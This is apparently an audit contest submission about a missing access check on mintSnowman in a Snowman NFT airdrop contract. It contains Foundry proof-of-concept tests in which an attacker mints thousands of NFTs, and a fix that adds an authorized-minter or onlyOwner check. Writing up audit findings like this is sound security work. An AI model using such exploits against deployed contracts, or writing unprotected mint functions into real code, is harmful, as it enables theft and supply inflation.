Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Missing Access Control in Snowman.mintSnowman Allows Unauthorized Unlimited NFT Minting`

alaaeldinsabib

Summary

The mintSnowman function in Snowman.sol lacks any access control mechanism. Although it is intended to be called exclusively by the SnowmanAirdrop contract after users stake Snow tokens and pass Merkle verification, any address can call it directly and mint an arbitrary number of NFTs.

This vulnerability completely bypasses the intended airdrop distribution logic and allows an attacker to mint the entire NFT supply.

Description

The Snowman contract is designed to mint NFTs only when users stake Snow tokens through the SnowmanAirdrop contract. However, the mintSnowman function has no access control modifier, making it publicly callable.

Root Cause

Contract: src/Snowman.sol
Function: mintSnowman (lines 38-45)

function mintSnowman(address receiver, uint256 amount) external {

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

The function is external with no access control (no onlyOwner, no onlyAuthorizedMinter, no onlyRole). There is no check that msg.sender is the SnowmanAirdrop contract.

Risk

Severity: Critical
Likelihood: High
Impact: Critical

Attack Scenario:

Attacker uses any Externally Owned Account (EOA)
Attacker calls snowman.mintSnowman(attacker, N) directly (N can be millions)
The contract mints the requested NFTs without any staking or Merkle proof
Legitimate airdrop participants receive diluted or zero value

Consequences:

Complete bypass of the staking + Merkle airdrop mechanism
Unlimited inflation of the NFT supply
Severe dilution of value for legitimate participants
Token ID counter manipulation
High reputational damage to the project

An attacker can drain the entire collection in a single transaction with zero cost.

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import {Test, console2} from "forge-std/Test.sol";

import {DeploySnowmanAirdrop} from "../script/DeploySnowmanAirdrop.s.sol";

import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";

import {Snowman} from "../src/Snowman.sol";

import {Snow} from "../src/Snow.sol";

contract SnowmanMintExploitTest is Test {

SnowmanAirdrop airdrop;

Snowman snowman;

Snow snow;

address attacker = makeAddr("attacker");

function setUp() public {

DeploySnowmanAirdrop deployer = new DeploySnowmanAirdrop();

(airdrop, snow, snowman) = deployer.run();

}

function test_AnyoneCanMintUnlimitedNFTs() public {

console2.log("=== CRITICAL: Missing Access Control Exploit ===");

uint256 initialCounter = snowman.getTokenCounter();

assertEq(initialCounter, 0);

// Attacker mints directly without going through airdrop

vm.prank(attacker);

snowman.mintSnowman(attacker, 1000);

assertEq(snowman.getTokenCounter(), 1000);

assertEq(snowman.balanceOf(attacker), 1000);

assertEq(snow.balanceOf(attacker), 0); // No Snow tokens staked!

console2.log("NFTs after attack:", snowman.getTokenCounter());

console2.log("Attacker NFT balance:", snowman.balanceOf(attacker));

console2.log("=== EXPLOIT SUCCESSFUL ===");

}

function test_AttackerCanDrainEntireSupply() public {

vm.prank(attacker);

snowman.mintSnowman(attacker, 10000);

assertEq(snowman.balanceOf(attacker), 10000);

console2.log("Attacker successfully drained 10,000 NFTs with zero Snow tokens");

}

Run Tests:

forge test -vv --match-contract SnowmanMintExploitTest

Expected Output:

=== CRITICAL: Missing Access Control Exploit ===

NFTs after attack: 1000

Attacker NFT balance: 1000

=== EXPLOIT SUCCESSFUL ===

Attacker successfully drained 10,000 NFTs with zero Snow tokens

Recommended Mitigation

Add access control to restrict minting to authorized contracts only:

contract Snowman is ERC721, Ownable {

error SM__UnauthorizedMinter();

uint256 private s_TokenCounter;

string private s_SnowmanSvgUri;

address private s_authorizedMinter;

event AuthorizedMinterSet(address indexed minter);

modifier onlyAuthorizedMinter() {

if (msg.sender != s_authorizedMinter && msg.sender != owner()) {

revert SM__UnauthorizedMinter();

}

constructor(string memory _SnowmanSvgUri)

ERC721("Snowman Airdrop", "SNOWMAN")

Ownable(msg.sender)

{

s_SnowmanSvgUri = _SnowmanSvgUri;

}

function setAuthorizedMinter(address _minter) external onlyOwner {

require(_minter != address(0), "Invalid minter");

s_authorizedMinter = _minter;

emit AuthorizedMinterSet(_minter);

}

function mintSnowman(address receiver, uint256 amount)

external

onlyAuthorizedMinter

{

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

Deployment Step: After deploying both contracts, call snowman.setAuthorizedMinter(address(airdrop)) from the owner.

Alternative (Recommended): Use OpenZeppelin's AccessControl for better role management.

References

CWE-284: Improper Access Control
CWE-862: Missing Authorization
SWC-105: Unprotected Ether Withdrawal

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!